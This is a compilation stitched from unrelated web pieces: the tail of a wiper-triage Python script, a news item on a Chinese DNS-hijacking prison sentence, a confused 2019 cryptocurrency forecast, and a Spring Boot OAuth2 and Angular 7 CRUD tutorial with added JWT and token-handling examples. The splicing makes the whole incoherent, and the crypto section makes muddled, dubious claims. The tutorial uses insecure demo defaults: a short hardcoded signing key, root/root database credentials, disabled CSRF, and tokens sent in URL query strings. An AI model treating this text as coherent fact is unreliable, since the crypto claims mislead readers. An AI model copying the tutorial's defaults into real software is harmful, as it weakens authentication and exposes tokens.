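    for path, reasons in triage_records(SAMPLE_RECORDS):
        print(path, "->", "; ".join(reasons))
```

The timestamp check matters because the hashes only catch the toolkit binaries, whereas the sentinel timestamp appears on every file the wiper touched, which makes it the quickest way to size the damage on a host after the fact.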

Finally Tackling a Chronic Problem: DNS Hijacking Will Now Lead to Prison Sentences


DNS (Domain Name System) hijacking, also called domain hijacking, is a network attack in which normal domain-resolution requests are intercepted and the user is returned a fake IP address, or the request is left unanswered, so that any website the user opens points to a purpose-built phishing or malicious site from which the attacker harvests the user's personal information. This harm is currently showing signs of spreading and has become a major scourge for enterprise mobile application operations.



On December 25 the Supreme People's Court released a batch of guiding cases on severely punishing cybercrime in accordance with the law, including three cases of the crime of damaging computer information systems. Among them, the "DNS hijacking" case of Fu Xuanhao and Huang Zichao is China's first case in which a prison sentence was handed down for "traffic hijacking".

In the past, "traffic hijacking" cases such as "DNS hijacking" were mostly handled as unfair-competition cases, and subsequent similar criminal cases were often charged differently by different courts. The Supreme Court's release of guiding cases can be said to settle the question of how "traffic hijacking" crimes are to be charged.

In addition, through two other cases the Supreme Court extended the interpretation of what constitutes a "computer information system" to include IoT-based remote mechanical monitoring systems and air samplers, which better protects enterprise property rights and environmental enforcement.


How Will 2019 Change Cryptocurrency?


2018 saw some major changes in the crypto world. We hope 2019 will be no different, except that the changes will lead to positive outcomes. Last year there were many developments in the blockchain realm, with people saying that Bitcoin mining is no longer profitable.

With that in mind, and after doing our research, here are some impending developments we would like to see this New Year:

New Crypto Currencies

The introduction of a new cryptocurrency is quickly noted in branding company directories around the world. Tether bid its farewell when it lost over 10% of its value within a week. The positive development is that this leads to more stablecoins, which make crypto-lending promising because they reduce price volatility to minor fluctuations.

This change has made it easy to get a crypto-backed loan. So yes, we believe cryptocurrency and blockchain will get more stable throughout 2019.

Better Security

Blockchains help make transactions secure and prevent fraud, which is leading to new applications. But security remains a primary concern, especially in the crypto economy, and security translates to stability in the financial marketplace. Companies are using decentralized biometric authentication to cut the chances of a data breach.

Mashable's Stan Schroeder perfectly encapsulated the insecurities people had with Bitcoin in his article "How 2018 Changed Bitcoin?". Security has remained a leading concern in cryptocurrency, but there have been some major improvements in the past.

STOs instead of ICOs

This could be the biggest blockchain development of 2019. There is a rumor that ICOs are dead, yet more than $11 billion has been raised through them. Still, ICOs are nearing their end thanks to the lack of regulation and a low success rate. Businesses have stopped running pre-ICO sales in crypto financing.

The process has gotten shorter, and people are selling tokens cheaply. This may lead to the rise of Security Token Offerings, which make securities on the blockchain transparent and transferable. STOs will replace ICOs as they are safer and ensure that investors are protected.

STOs help make excellent investment plans: they offer fixed or flexible returns, depending on the company's revenue, along with non-proprietary rights. Anyone suggesting that their company invest in STO crypto will benefit from it.

The Rules will be Strict

Forbes did an excellent review of David Clarke's Behind the Cloud Ep. 6, in which he discussed blockchain and self-sovereign identity. David discusses how cloud and blockchain security can and will be improved shortly.

More rules are going to be introduced in the crypto space, and we are fine with it. It just makes the market stable and safe for us. The issue is that companies want to know whether fundraising should be done with STOs or ICOs.

Some crypto platforms are unlicensed and unchecked. This makes it hard for companies that want to reach more companies with better inquiries and enjoy better compliance from existing players, especially those wanting to start a business.

The market wants to regulate itself before any government body takes over. There is an idea that industry-wide associations will team up with crypto-backed loan companies to help protect consumers through legal compliance.

Customers will be Empowered

Custody solutions and insurance are becoming a standard in the crypto world. Clear regulations are imperative because they help protect your blockchain assets; they build trust and attract investors. It is important to offer your investors a chance to trade in crypto without the risk of theft, which is why most crypto exchanges feature custody offerings. This is helping custody solutions become mainstream and affordable.

Mainstream Adoption

Since the introduction of Bitcoin and blockchain technology, everyone has been talking about mainstream adoption. When will investors be able to bet against Bitcoin and settle their contracts in real money? When will someone be able to trade Bitcoin without even owning it?

Cryptocurrency has hit the mainstream. We will soon see cryptocurrency-backed loans; these loans will be fast and help everyone make a profit in exchange for their coins. In short, cryptocurrency is becoming a well-recognized commodity.

Spring Boot Security Oauth2 With Angular


In this article, we will be creating a sample Spring Boot application with REST APIs exposed. These REST APIs will be secured with the OAuth2 protocol, with JWT as the TokenStore. On the client side, we will create an Angular 7 based application to consume the REST APIs. The Angular application will first obtain the OAuth2 authorization token from an AuthorizationServer and then consume the REST APIs to perform CRUD operations on a User entity. Here we will use a MySQL database to read user credentials instead of in-memory authentication.

In short, we will be creating a full stack app using Spring Boot OAuth2 and Angular 7. Though the client is built using Angular 7, the same is valid for other Angular versions such as Angular 5 and Angular 6. In my previous articles we have already created multiple Spring Boot applications using OAuth2, so we will re-use some of the components from them. You can visit this for the full list of Spring Security applications that we have built earlier. Also, you can visit this Angular 7 CRUD app to get started with an Angular 7 app.

Spring Security OAuth2 provides a default token store, but the implementation also provides the functionality to define a custom token store. Here we will use JwtTokenStore. Using JwtTokenStore as the token provider allows us to customize the generated token with a TokenEnhancer to add additional claims.

What is OAuth2

OAuth 2 is an authorization framework that enables applications to obtain limited access to user accounts on an HTTP service, such as Facebook, GitHub, and DigitalOcean. It works by delegating user authentication to the service that hosts the user account, and authorizing third-party applications to access the user account. OAuth 2 provides authorization flows for web and desktop applications, and mobile devices.

OAuth2 Roles

OAuth2 defines four roles:

Resource Owner: User

Client: Application

Resource Server: API

Authorization Server: API

OAuth2 Grant Types

Following are the four grant types defined by OAuth2:

Authorization Code: used with server-side Applications

Implicit: used with Mobile Apps or Web Applications (applications that run on the user's device)

Resource Owner Password Credentials: used with trusted Applications, such as those owned by the service itself

Client Credentials: used with Applications API access

Spring Boot OAUTH2 Project Structure
OAuth2 Authorization Server Config

This class extends AuthorizationServerConfigurerAdapter and is responsible for generating tokens specific to a client. Suppose a user wants to log in to devglan.com via Facebook; then Facebook's auth server generates tokens for Devglan. In this case Devglan is the client, which requests an authorization code on behalf of the user from Facebook, the authorization server.

Here, JwtAccessTokenConverter is the helper that translates between JWT-encoded token values and OAuth authentication information. We have added our custom signing key to make the JWT token more robust. Apart from JwtTokenStore, Spring Security also provides InMemoryTokenStore and JdbcTokenStore.
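To see what the signing key passed to JwtAccessTokenConverter actually protects, the following Python code is an added example (not part of the article's Spring project) that reproduces the HMAC-SHA256 signing Spring uses for a plain-string key and the checks a resource server must perform: algorithm pinning, signature verification, expiry and scope. The claim names are modelled on the ones Spring's converter emits; the `mint_token`, `verify_token`, `token_is_accepted` and `hs256_key_is_adequate` functions, the fixed clock and the claim values are the example's own; and the key `as466gf` is the one the article's configuration sets, used here to show that it is far shorter than the 256 bits RFC 7518 requires for HS256.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Signing key from the article's AuthorizationServerConfig (demo only: far too short).
ARTICLE_SIGNING_KEY = "as466gf"
ACCESS_TOKEN_VALIDITY_SECONDS = 1 * 60 * 60   # same value as the article's config
SAMPLE_NOW = 1_545_000_000                    # fixed clock (Dec 2018) so results are reproducible

# Constructed claims, shaped like the ones Spring's JwtAccessTokenConverter emits.
SAMPLE_CLAIMS = {
    "user_name": "admin",
    "scope": ["read", "write", "trust"],
    "authorities": ["ADMIN"],
    "client_id": "devglan-client",
    "jti": "constructed-token-id",
    "exp": SAMPLE_NOW + ACCESS_TOKEN_VALIDITY_SECONDS,
}


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _hs256(key: str, signing_input: bytes) -> bytes:
    return hmac.new(key.encode("utf-8"), signing_input, hashlib.sha256).digest()


def mint_token(claims: dict, key: str) -> str:
    """Authorization-server side: sign base64url(header).base64url(payload) with HMAC-SHA256."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = _hs256(key, f"{header}.{payload}".encode("ascii"))
    return f"{header}.{payload}.{_b64url_encode(signature)}"


def verify_token(token: str, key: str, required_scope: str, now: Optional[float] = None) -> dict:
    """Resource-server side. Raises ValueError unless the token is signed with `key`,
    uses the pinned algorithm, is unexpired and carries `required_scope`."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    # Pin the algorithm instead of honouring whatever the token claims ("none", key confusion).
    if header.get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    expected = _hs256(key, f"{header_b64}.{payload_b64}".encode("ascii"))
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    current = time.time() if now is None else now
    if claims.get("exp", 0) <= current:
        raise ValueError("token expired")
    if required_scope not in claims.get("scope", []):
        raise ValueError("insufficient scope")
    return claims


def token_is_accepted(token: str, key: str, required_scope: str, now: float) -> bool:
    """Convenience wrapper: True if verify_token accepts the token, False on any rejection."""
    try:
        verify_token(token, key, required_scope, now)
        return True
    except ValueError:
        return False


def hs256_key_is_adequate(key: str) -> bool:
    """RFC 7518 section 3.2: an HS256 key must be at least as long as the hash output (32 bytes)."""
    return len(key.encode("utf-8")) >= 32


if __name__ == "__main__":
    token = mint_token(SAMPLE_CLAIMS, ARTICLE_SIGNING_KEY)
    print(token)
    print("accepted:", token_is_accepted(token, ARTICLE_SIGNING_KEY, "read", SAMPLE_NOW))
    print("key adequate:", hs256_key_is_adequate(ARTICLE_SIGNING_KEY))
```

With a symmetric key, every resource server that verifies tokens also holds the key that mints them, so a leaked key from any of them lets an attacker forge tokens with arbitrary `authorities`; use a key of at least 32 random bytes (or switch the converter to an RSA key pair so resource servers only hold the public key), and never let the token's `alg` header choose the verification algorithm.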

Here we are using in-memory client credentials with client_id devglan-client and CLIENT_SECRET devglan-secret (bcrypt-encoded here, as Spring Boot 2 requires), but you are free to use the JDBC implementation too.

@EnableAuthorizationServer: enables an authorization server. AuthorizationServerEndpointsConfigurer defines the authorization and token endpoints and the token services.

You can use this tool to generate a bcrypt hash from a plain-text password online.

AuthorizationServerConfig.java

```java
package com.devglan.config;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.AuthenticationManager;
import org.springframework.security.oauth2.config.annotation.configurers.ClientDetailsServiceConfigurer;
import org.springframework.security.oauth2.config.annotation.web.configuration.AuthorizationServerConfigurerAdapter;
import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;
import org.springframework.security.oauth2.config.annotation.web.configurers.AuthorizationServerEndpointsConfigurer;
import org.springframework.security.oauth2.provider.token.TokenStore;
import org.springframework.security.oauth2.provider.token.store.JwtAccessTokenConverter;
import org.springframework.security.oauth2.provider.token.store.JwtTokenStore;

@Configuration
@EnableAuthorizationServer
public class AuthorizationServerConfig extends AuthorizationServerConfigurerAdapter {

    static final String CLIENT_ID = "devglan-client";
    // static final String CLIENT_SECRET = "devglan-secret";
    // bcrypt hash of "devglan-secret": Spring Boot 2 expects the client secret to be encoded
    static final String CLIENT_SECRET = "$2a$04$e/c1/RfsWuThaWFCrcCuJeoyvwCV0URN/6Pn9ZFlrtIWaU/vj/BfG";
    static final String GRANT_TYPE_PASSWORD = "password";
    static final String AUTHORIZATION_CODE = "authorization_code";
    static final String REFRESH_TOKEN = "refresh_token";
    static final String IMPLICIT = "implicit";
    static final String SCOPE_READ = "read";
    static final String SCOPE_WRITE = "write";
    static final String TRUST = "trust";
    static final int ACCESS_TOKEN_VALIDITY_SECONDS = 1 * 60 * 60;
    static final int REFRESH_TOKEN_VALIDITY_SECONDS = 6 * 60 * 60;

    @Autowired
    private AuthenticationManager authenticationManager;

    @Bean
    public JwtAccessTokenConverter accessTokenConverter() {
        JwtAccessTokenConverter converter = new JwtAccessTokenConverter();
        // symmetric signing key: the same value is used to verify tokens on the resource server
        converter.setSigningKey("as466gf");
        return converter;
    }

    @Bean
    public TokenStore tokenStore() {
        return new JwtTokenStore(accessTokenConverter());
    }

    @Override
    public void configure(ClientDetailsServiceConfigurer configurer) throws Exception {
        configurer
            .inMemory()
            .withClient(CLIENT_ID)
            .secret(CLIENT_SECRET)
            .authorizedGrantTypes(GRANT_TYPE_PASSWORD, AUTHORIZATION_CODE, REFRESH_TOKEN, IMPLICIT)
            .scopes(SCOPE_READ, SCOPE_WRITE, TRUST)
            .accessTokenValiditySeconds(ACCESS_TOKEN_VALIDITY_SECONDS)
            .refreshTokenValiditySeconds(REFRESH_TOKEN_VALIDITY_SECONDS);
    }

    @Override
    public void configure(AuthorizationServerEndpointsConfigurer endpoints) {
        endpoints.tokenStore(tokenStore())
            .authenticationManager(authenticationManager)
            .accessTokenConverter(accessTokenConverter());
    }
}
```

Resource Server Config

Resource in our context is the REST API which we have exposed for the crud operation. To access these resources, the client must be authenticated. In real-time scenarios, whenever a user tries to access these resources, the user will be asked to provide his authenticity and once the user is authorized then he will be allowed to access these protected resources.

resourceId : the id for the resource (optional, but recommended and will be validated by the auth server if present).

ResourceServerConfig.java

```java
package com.devglan.config;

import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer;
import org.springframework.security.oauth2.config.annotation.web.configuration.ResourceServerConfigurerAdapter;
import org.springframework.security.oauth2.config.annotation.web.configurers.ResourceServerSecurityConfigurer;
import org.springframework.security.oauth2.provider.error.OAuth2AccessDeniedHandler;

@Configuration
@EnableResourceServer
public class ResourceServerConfig extends ResourceServerConfigurerAdapter {

    private static final String RESOURCE_ID = "resource_id";

    @Override
    public void configure(ResourceServerSecurityConfigurer resources) {
        resources.resourceId(RESOURCE_ID).stateless(false);
    }

    @Override
    public void configure(HttpSecurity http) throws Exception {
        http
            .anonymous().disable()
            .authorizeRequests()
            // every /users/** endpoint requires the ADMIN role carried in the token's authorities
            .antMatchers("/users/**").access("hasRole('ADMIN')")
            .and().exceptionHandling().accessDeniedHandler(new OAuth2AccessDeniedHandler());
    }
}
```

OAUTH2 Security Config

This class extends WebSecurityConfigurerAdapter and provides the usual Spring Security configuration. Here we use the bcrypt encoder to encode our passwords; you can try this online Bcrypt Tool to encode and match bcrypt passwords. The following configuration bootstraps the authorization server and the resource server.

@EnableWebSecurity : Enables spring security web security support.

@EnableGlobalMethodSecurity : Support to have method level access control such as @PreAuthorize @PostAuthorize

SecurityConfig.java

```java
package com.devglan.config;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.AuthenticationManager;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;

import javax.annotation.Resource;

@Configuration
@EnableWebSecurity
@EnableGlobalMethodSecurity(prePostEnabled = true)
public class SecurityConfig extends WebSecurityConfigurerAdapter {

    @Resource(name = "userService")
    private UserDetailsService userDetailsService;

    @Override
    @Bean
    public AuthenticationManager authenticationManagerBean() throws Exception {
        return super.authenticationManagerBean();
    }

    @Autowired
    public void globalUserDetails(AuthenticationManagerBuilder auth) throws Exception {
        // user credentials come from the database via userService; passwords are bcrypt-hashed
        auth.userDetailsService(userDetailsService)
            .passwordEncoder(encoder());
    }

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http
            .csrf().disable()
            .anonymous().disable()
            .authorizeRequests()
            .antMatchers("/api-docs/**").permitAll();
    }

    @Bean
    public BCryptPasswordEncoder encoder() {
        return new BCryptPasswordEncoder();
    }
}
```

REST APIs Implementation

Now let us define our controller class.

UserController.java

```java
import java.util.List;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("/users")
public class UserController {

    @Autowired
    private UserService userService;

    @RequestMapping(value = "/user", method = RequestMethod.GET)
    public List<User> listUser() {
        return userService.findAll();
    }

    @RequestMapping(value = "/user", method = RequestMethod.POST)
    public User create(@RequestBody User user) {
        return userService.save(user);
    }

    @RequestMapping(value = "/user/{id}", method = RequestMethod.GET)
    public User findOne(@PathVariable long id) {
        return userService.findOne(id);
    }

    @RequestMapping(value = "/user/{id}", method = RequestMethod.PUT)
    public User update(@PathVariable long id, @RequestBody User user) {
        user.setId(id);
        return userService.save(user);
    }

    @RequestMapping(value = "/user/{id}", method = RequestMethod.DELETE)
    public void delete(@PathVariable(value = "id") Long id) {
        userService.delete(id);
    }
}
```

User.java

```java
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;

import com.fasterxml.jackson.annotation.JsonIgnore;

@Entity
public class User {

    @Id
    @GeneratedValue(strategy = GenerationType.IDENTITY)
    private long id;
    @Column
    private String firstName;
    @Column
    private String lastName;
    @Column
    private String username;
    @Column
    @JsonIgnore          // the password hash is never serialised into API responses
    private String password;
    @Column
    private long salary;
    @Column
    private int age;

    // setters and getters
}
```

application.properties

```properties
spring.datasource.url=jdbc:mysql://localhost:3306/test
spring.datasource.username=root
spring.datasource.password=root
spring.jpa.show-sql=true
spring.datasource.driver-class-name=com.mysql.jdbc.Driver
```

Below is the default SQL script that can be used for initial setup.

script.sql

```sql
create table user (
  id bigint not null auto_increment,
  age integer,
  first_name varchar(255),
  last_name varchar(255),
  password varchar(255),
  salary bigint,
  username varchar(255),
  primary key (id)
) engine=MyISAM;

-- the password column holds the bcrypt hash of "admin"
INSERT INTO user (age, first_name, last_name, password, salary, username)
VALUES (23, 'admin', 'admin', '$2a$04$EZzbSqieYfe/nFWfBWt2KeCdyq0UuDEM1ycFF8HzmlVR6sbsOnw7u', 12345, 'admin');
```

Angular OAUTH2 Implementation

First we generate an Angular 7 app using the Angular CLI and then create separate components for creating, editing, adding and deleting users. The step-by-step demonstration of creating an Angular 7 app can be found in my previous article here: Angular 7 CRUD App. Below is the project structure.



Below is the list of command that we have used to generate above project structure.

npm i npm@latest -g
ng new my-dream-app
cd my-dream-app
ng serve
ng g component login
ng g component add-user
ng g component edit-user
ng g component list-user

OAUTH2 Login In Angular

We have reactive forms defined. Once the form is submitted, the endpoint at oauth/token will be hit to get the token. Below are the API details:

API Name - Login
Method - POST
URL - oauth/token
Header - 'Authorization': 'Basic ' + btoa('devglan-client:devglan-secret')
Body - {'username': 'admin', 'password': 'admin', 'grant_type': 'password'}
Content-type: application/x-www-form-urlencoded

login.component.html

<div class="row">
  <div class="col-md-6 login-container">
    <h2 style="margin: auto">Login</h2>
    <form [formGroup]="loginForm" (ngSubmit)="onSubmit()">
      <div class="form-group">
        <label for="username">UserName:</label>
        <input type="text" class="form-control" formControlName="username" id="username" autocomplete="off">
        <div class="error" *ngIf="loginForm.controls['username'].hasError('required') && loginForm.controls['username'].touched">Username is required</div>
      </div>
      <div class="form-group">
        <label for="pwd">Password:</label>
        <input type="password" class="form-control" formControlName="password" id="pwd" autocomplete="off">
        <div class="error" *ngIf="loginForm.controls['password'].hasError('required') && loginForm.controls['password'].touched">Password is required</div>
      </div>
      <button class="btn btn-success" [disabled]="loginForm.invalid">Login</button>
      <div *ngIf="invalidLogin" class="error">
        <div>Invalid credentials.</div>
      </div>
    </form>
  </div>
</div>
login.component.ts

import { Component, OnInit } from '@angular/core';
import { FormBuilder, FormGroup, Validators } from '@angular/forms';
import { Router } from '@angular/router';
import { HttpParams } from '@angular/common/http';
import { ApiService } from '../core/api.service';

@Component({
  selector: 'app-login',
  templateUrl: './login.component.html',
  styleUrls: ['./login.component.css']
})
export class LoginComponent implements OnInit {

  loginForm: FormGroup;
  invalidLogin: boolean = false;

  constructor(private formBuilder: FormBuilder, private router: Router, private apiService: ApiService) { }

  onSubmit() {
    if (this.loginForm.invalid) {
      return;
    }
    // Password grant: user credentials and grant_type go in a form-encoded body
    const body = new HttpParams()
      .set('username', this.loginForm.controls.username.value)
      .set('password', this.loginForm.controls.password.value)
      .set('grant_type', 'password');
    this.apiService.login(body.toString()).subscribe(data => {
      // the whole token response is kept in sessionStorage for later API calls
      window.sessionStorage.setItem('token', JSON.stringify(data));
      console.log(window.sessionStorage.getItem('token'));
      this.router.navigate(['list-user']);
    }, error => {
      alert(error.error.error_description);
    });
  }

  ngOnInit() {
    window.sessionStorage.removeItem('token');
    this.loginForm = this.formBuilder.group({
      username: ['', Validators.compose([Validators.required])],
      password: ['', Validators.required]
    });
  }
}

api.service.ts

Check the login API here. This is exactly as per the API definition we defined above.

import { Injectable } from '@angular/core';
import { HttpClient } from '@angular/common/http';
import { Observable } from 'rxjs';
// User and ApiResponse are the app's own model classes; their imports are omitted here

@Injectable()
export class ApiService {

  constructor(private http: HttpClient) { }

  baseUrl: string = 'http://localhost:8080/users/';

  login(loginPayload) {
    // client credentials as HTTP Basic, body as application/x-www-form-urlencoded
    const headers = {
      'Authorization': 'Basic ' + btoa('devglan-client:devglan-secret'),
      'Content-type': 'application/x-www-form-urlencoded'
    };
    return this.http.post('http://localhost:8080/' + 'oauth/token', loginPayload, {headers});
  }

  // the resource server accepts the access token as an access_token query parameter
  getUsers() {
    return this.http.get(this.baseUrl + 'user?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token);
  }

  getUserById(id: number) {
    return this.http.get(this.baseUrl + 'user/' + id + '?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token);
  }

  createUser(user: User) {
    return this.http.post<ApiResponse>(this.baseUrl + 'user?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token, user);
  }

  updateUser(user: User): Observable<ApiResponse> {
    return this.http.put<ApiResponse>(this.baseUrl + 'user/' + user.id + '?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token, user);
  }

  deleteUser(id: number) {
    return this.http.delete<ApiResponse>(this.baseUrl + 'user/' + id + '?access_token=' + JSON.parse(window.sessionStorage.getItem('token')).access_token);
  }
}
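The token exchange and token handling above, as an added example in plain TypeScript that is not part of the article's code. It assumes the same client id and secret (devglan-client / devglan-secret) and the same /oauth/token endpoint; the function names (buildTokenRequest, storeToken, bearerHeader, redactTokenFromUrl) are my own. It differs from the article in two points a security reviewer would raise: the access token goes in an Authorization: Bearer header rather than in an access_token query parameter (query strings end up in server logs, proxy logs and browser history), and expires_in is tracked so an expired token is never sent.

```typescript
// Added example, not from the article: password-grant token request and
// client-side token handling. Names are hypothetical; sample values constructed.

// Ambient declaration so the file compiles with or without the DOM lib; at
// runtime btoa is provided by browsers and by Node.js 16+.
declare function btoa(data: string): string;

export interface TokenRequest {
  url: string;
  headers: Record<string, string>;
  body: string;
}

// Shape of a successful RFC 6749 token response.
export interface TokenResponse {
  access_token: string;
  token_type: string;
  expires_in: number;
  refresh_token?: string;
}

export interface StoredToken {
  accessToken: string;
  refreshToken?: string;
  expiresAt: number; // epoch milliseconds
}

// application/x-www-form-urlencoded body, the encoding the token endpoint expects.
function formEncode(params: Record<string, string>): string {
  return Object.keys(params)
    .map(k => encodeURIComponent(k) + '=' + encodeURIComponent(params[k]))
    .join('&');
}

// Build the POST to /oauth/token: client credentials in a Basic header, user
// credentials and grant_type in the form body (never in the URL).
export function buildTokenRequest(
  baseUrl: string, clientId: string, clientSecret: string,
  username: string, password: string): TokenRequest {
  return {
    url: baseUrl.replace(/\/+$/, '') + '/oauth/token',
    headers: {
      Authorization: 'Basic ' + btoa(clientId + ':' + clientSecret),
      'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: formEncode({ grant_type: 'password', username: username, password: password }),
  };
}

// Record when the token stops being usable, with a safety margin so a token
// about to expire is not sent on a request that reaches the server too late.
export function storeToken(resp: TokenResponse, nowMs: number, skewSeconds: number = 30): StoredToken {
  const lifetimeMs = Math.max(0, resp.expires_in - skewSeconds) * 1000;
  return { accessToken: resp.access_token, refreshToken: resp.refresh_token, expiresAt: nowMs + lifetimeMs };
}

export function isExpired(token: StoredToken, nowMs: number): boolean {
  return nowMs >= token.expiresAt;
}

// Bearer header for resource requests; refuses to hand out an expired token.
export function bearerHeader(token: StoredToken, nowMs: number): Record<string, string> {
  if (isExpired(token, nowMs)) {
    throw new Error('access token expired; refresh or re-authenticate');
  }
  return { Authorization: 'Bearer ' + token.accessToken };
}

// For logging URLs produced by code that still passes access_token as a query
// parameter (as the article's ApiService does): mask the token value.
export function redactTokenFromUrl(url: string): string {
  return url.replace(/([?&]access_token=)[^&#]*/g, '$1[REDACTED]');
}
```

In an Angular app the bearerHeader call would sit in an HttpInterceptor so that every request to the resource server carries the header and no service has to append the token to URLs by hand.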

We have a similar implementation to add and edit a user. The implementation is very basic; do let me know if you need any clarification in the comment section below.

After a successful login, the list-user route will be loaded and getUsers() will be invoked, which loads the list of users from the API and shows them in tabular form. Each row has a button to either update or delete that user. The Add button opens a new form to add a user. On click of the edit button, the selected user id is cached in session storage and the edit component is loaded with the user details auto-populated from the DB. A click on the delete button instantly deletes the user from the DB and updates the table.

add-user.component.html

<div class="col-md-6 user-container">
  <h2 class="text-center">Add User</h2>
  <form [formGroup]="addForm" (ngSubmit)="onSubmit()">
    <div class="form-group">
      <label for="username">User Name:</label>
      <input type="text" formControlName="username" placeholder="username" name="username" class="form-control" id="username">
    </div>
    <div class="form-group">
      <label for="password">Password:</label>
      <input type="password" formControlName="password" placeholder="password" name="password" class="form-control" id="password">
    </div>
    <div class="form-group">
      <label for="firstName">First Name:</label>
      <input formControlName="firstName" placeholder="First Name" name="firstName" class="form-control" id="firstName">
    </div>
    <div class="form-group">
      <label for="lastName">Last Name:</label>
      <input formControlName="lastName" placeholder="Last name" name="lastName" class="form-control" id="lastName">
    </div>
    <div class="form-group">
      <label for="age">Age:</label>
      <input type="number" formControlName="age" placeholder="age" name="age" class="form-control" id="age">
    </div>
    <div class="form-group">
      <label for="salary">Salary:</label>
      <input type="number" formControlName="salary" placeholder="salary" name="salary" class="form-control" id="salary">
    </div>
    <button class="btn btn-success">Update</button>
  </form>
</div>

add-user.component.ts

import { Component, OnInit } from '@angular/core';
import { FormBuilder, FormGroup, Validators } from '@angular/forms';
import { Router } from '@angular/router';
import { ApiService } from '../core/api.service';

@Component({
  selector: 'app-add-user',
  templateUrl: './add-user.component.html',
  styleUrls: ['./add-user.component.css']
})
export class AddUserComponent implements OnInit {

  constructor(private formBuilder: FormBuilder, private router: Router, private apiService: ApiService) { }

  addForm: FormGroup;

  ngOnInit() {
    this.addForm = this.formBuilder.group({
      id: [],
      username: ['', Validators.required],
      password: ['', Validators.required],
      firstName: ['', Validators.required],
      lastName: ['', Validators.required],
      age: ['', Validators.required],
      salary: ['', Validators.required]
    });
  }

  onSubmit() {
    this.apiService.createUser(this.addForm.value)
      .subscribe(data => {
        this.router.navigate(['list-user']);
      });
  }
}

edit-user.component.html

<div class="col-md-6 user-container">
  <h2 class="text-center">Edit User</h2>
  <form [formGroup]="editForm" (ngSubmit)="onSubmit()">
    <div class="hidden">
      <input type="text" formControlName="id" placeholder="id" name="id" class="form-control" id="id">
    </div>
    <div class="form-group">
      <label for="username">User Name:</label>
      <input type="text" formControlName="username" placeholder="username" name="username" class="form-control" id="username" readonly="true">
    </div>
    <div class="form-group">
      <label for="firstName">First Name:</label>
      <input formControlName="firstName" placeholder="First Name" name="firstName" class="form-control" id="firstName">
    </div>
    <div class="form-group">
      <label for="lastName">Last Name:</label>
      <input formControlName="lastName" placeholder="Last name" name="lastName" class="form-control" id="lastName">
    </div>
    <div class="form-group">
      <label for="age">Age:</label>
      <input type="number" formControlName="age" placeholder="age" name="age" class="form-control" id="age">
    </div>
    <div class="form-group">
      <label for="salary">Salary:</label>
      <input type="number" formControlName="salary" placeholder="salary" name="salary" class="form-control" id="salary">
    </div>
    <button class="btn btn-success">Update</button>
  </form>
</div>

edit-user.component.ts

import { Component, OnInit } from '@angular/core';
import { FormBuilder, FormGroup, Validators } from '@angular/forms';
import { Router } from '@angular/router';
import { first } from 'rxjs/operators';
import { ApiService } from '../core/api.service';
// User is the app's own model class; its import is omitted here

@Component({
  selector: 'app-edit-user',
  templateUrl: './edit-user.component.html',
  styleUrls: ['./edit-user.component.css']
})
export class EditUserComponent implements OnInit {

  user: User;
  editForm: FormGroup;

  constructor(private formBuilder: FormBuilder, private router: Router, private apiService: ApiService) { }

  ngOnInit() {
    // the list component stored the selected id in session storage
    let userId = window.sessionStorage.getItem("editUserId");
    if (!userId) {
      alert("Invalid action.");
      this.router.navigate(['list-user']);
      return;
    }
    this.editForm = this.formBuilder.group({
      id: [''],
      username: ['', Validators.required],
      firstName: ['', Validators.required],
      lastName: ['', Validators.required],
      age: ['', Validators.required],
      salary: ['', Validators.required]
    });
    this.apiService.getUserById(+userId)
      .subscribe(data => {
        this.editForm.setValue(data);
      });
  }

  onSubmit() {
    this.apiService.updateUser(this.editForm.value)
      .pipe(first())
      .subscribe(data => {
        alert('User updated successfully.');
        this.router.navigate(['list-user']);
      }, error => {
        alert(error);
      });
  }
}

Following is our angular module and routing configuration.

app.module.ts

import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';

import { AppComponent } from './app.component';
import { LoginComponent } from './login/login.component';
import { AddUserComponent } from './add-user/add-user.component';
import { EditUserComponent } from './edit-user/edit-user.component';
import { ListUserComponent } from './list-user/list-user.component';
import {ApiService} from "./core/api.service";
import {HttpClientModule} from "@angular/common/http";
